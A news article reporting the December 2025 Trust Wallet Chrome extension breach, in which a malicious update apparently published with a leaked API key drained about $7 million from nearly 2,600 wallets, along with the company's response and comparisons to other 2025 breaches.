2 min read

Trust Wallet hack drains 7 million from nearly 2,600 crypto wallets

Kirsten Peremore Dec 30, 2025 10:15:46 AM

News

Trust Wallet hack drains 7 million from nearly 2,600 crypto wallets

On December 24, 2025, Trust Wallet, a popular cryptocurrency wallet acquired by Binance in 2018 but operating independently, suffered a major security breach that resulted in the theft of approximately $7 million from nearly 2,600 wallets.

What happened

The attack targeted version 2.68.0 of Trust Wallet’s Chrome extension, which had been compromised with malicious JavaScript that exfiltrated sensitive wallet data. The extension passed Chrome Web Store’s review and went live on December 24, 2025.

The breach immediately put thousands of cryptocurrency users at risk, as the attackers were able to drain funds from wallets holding Bitcoin, Ethereum, Solana, and thousands of other digital tokens. In response, Trust Wallet released version 2.69 of the Chrome extension, blocked all release APIs for two weeks, and reported the malicious exfiltration domain to NiceNIC, which promptly suspended it.

Despite these actions, the attackers launched a follow-on phishing campaign using a fraudulent Trust Wallet-branded website, attempting to trick users into revealing their wallet recovery seed phrases under the guise of a security update. By December 29, 2025, Trust Wallet had confirmed that 2,596 wallet addresses were affected and that over 5,000 claims had been submitted for reimbursement, prompting the company to carefully verify ownership to ensure funds were returned to legitimate victims. Trust Wallet warned users not to share private keys, seed phrases, or passwords and to only rely on official communication channels.

Why was the malicious extension approved

According to CEO Eowyn Chen on X, the compromised extension “was NOT released through our internal manual process,” indicating that the standard internal checks designed to catch unauthorized or malicious code were bypassed. Investigators believe the attackers used a leaked Chrome Web Store API key to submit the extension externally.

Chrome Web Store’s review process, while effective at catching many common threats, relies on automated and procedural checks that can sometimes fail to detect sophisticated attacks, particularly when the submission appears legitimate and does not trigger known malicious signatures.

What was said

In the post on X, they noted, “A working hypothesis (still under investigation):

The hacker used a leaked Chrome Web Store API key to submit the malicious extension version v2.68. This successfully passed Chrome Web Store's review and was released on Dec 24, 2025 at 12:32 UTC.”

Why it matters

The Trust Wallet breach follows a stream of cyber incidents seen throughout 2025, including the Episource ransomware attack and the DaVita ransomware incident, even though it occurred outside a traditional healthcare setting.

In the Episource case, attackers gained access to a healthcare IT vendor between January 27 and February 6, 2025, exposing medical coding data, insurance information, and personal identifiers tied to more than 5.4 million patients and providers. DaVita experienced a similar outcome beginning March 24, 2025, when ransomware disrupted operations and exposed sensitive data for approximately 2.69 million individuals. Trust Wallet followed the same trajectory, with attackers exploiting a leaked Chrome Web Store API key to publish a malicious browser extension update that bypassed internal controls and quietly harvested wallet credentials at scale.